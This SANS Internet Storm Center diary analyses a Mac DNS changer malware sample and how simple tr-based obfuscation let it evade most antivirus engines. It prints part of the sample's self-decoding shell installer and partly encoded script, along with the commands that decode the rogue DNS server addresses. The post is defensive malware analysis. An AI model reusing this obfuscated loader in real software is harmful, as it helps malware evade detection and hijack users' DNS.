Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: (Minor) evolution in Mac DNS changer malware SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
(Minor) evolution in Mac DNS changer malware

Back in November last year we published a diary about Mac DNS changer malware ( The main idea about this was to let Mac users aware that the bad guys are not ignoring this platform any more.

While the malware itself was not anything spectacular (i.e. it did not exploit any vulnerabilities, but was based on social engineering), the way it was packed showed that the attackers meant real business.

All the malware did was change local DNS servers to couple of servers in a known bad network, and tell the command and control server that a new victim is ready.

The anti-virus coverage was especially disappointing. Only couple of anti-virus programs detected the original sample (a DMG file). This improved a bit over the time, so when I tested the sample again today on VirusTotal, 10 anti-virus programs detected it.

One of our readers, Matt, submitted a new sample today. I quickly analyzed it and the sample does exactly the same thing as the one from September – it changes the DNS servers and reports to a C&C server.

However, one thing I noticed was that the attackers started obfuscating the installation code. The obfuscation is very, very simple (they only use the tr command) but, unfortunately, it was enough to fool almost *all* anti-virus programs – according to VirusTotal, this new sample was detected by only 2 (!!) AV programs. Signature detection failure I would say …

The deobfuscation is really simple: the new sample looks like this:


x=`cat "$0" |wc -l|awk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" |tr vdehrujzpbqafwtgkxyilcnos
sh 1 `echo $s1|tr qazwsxedcr 0123456789` `echo $s2| tr qazwsxedcr 0123456789`;exit;

daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi | tjkd PjphajcSkjsplk | okq -k 'o/.*PjphajcSkjsplk : //')<< EOF

In other words, they take the file, count the lines, subtract 2 from the line number, tail the rest and pass it through the first tr command, and redirect the output to 1.

Second 2 tr commands are used to deobfuscate the s1 and s2 variables, which will contain the IP addresses of the DNS servers. These can be easily deobfuscated manually:

$ s1=cx.zxx.aax.zq;s2=cx.zxx.aaz.asw; echo $s1|tr qazwsxedcr 0123456780
$ echo $s2| tr qazwsxedcr 0123456789

As you can see, it's the same network as before, so make sure that you are monitoring any DNS requests going there since they indicate you have infected machines on your network. And for the AV vendors – they will obviously have to step up on the Mac front.




I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Amsterdam January 2021


392 Posts
ISC Handler
Apr 30th 2008

Sign Up for Free or Log In to start participating in the conversation!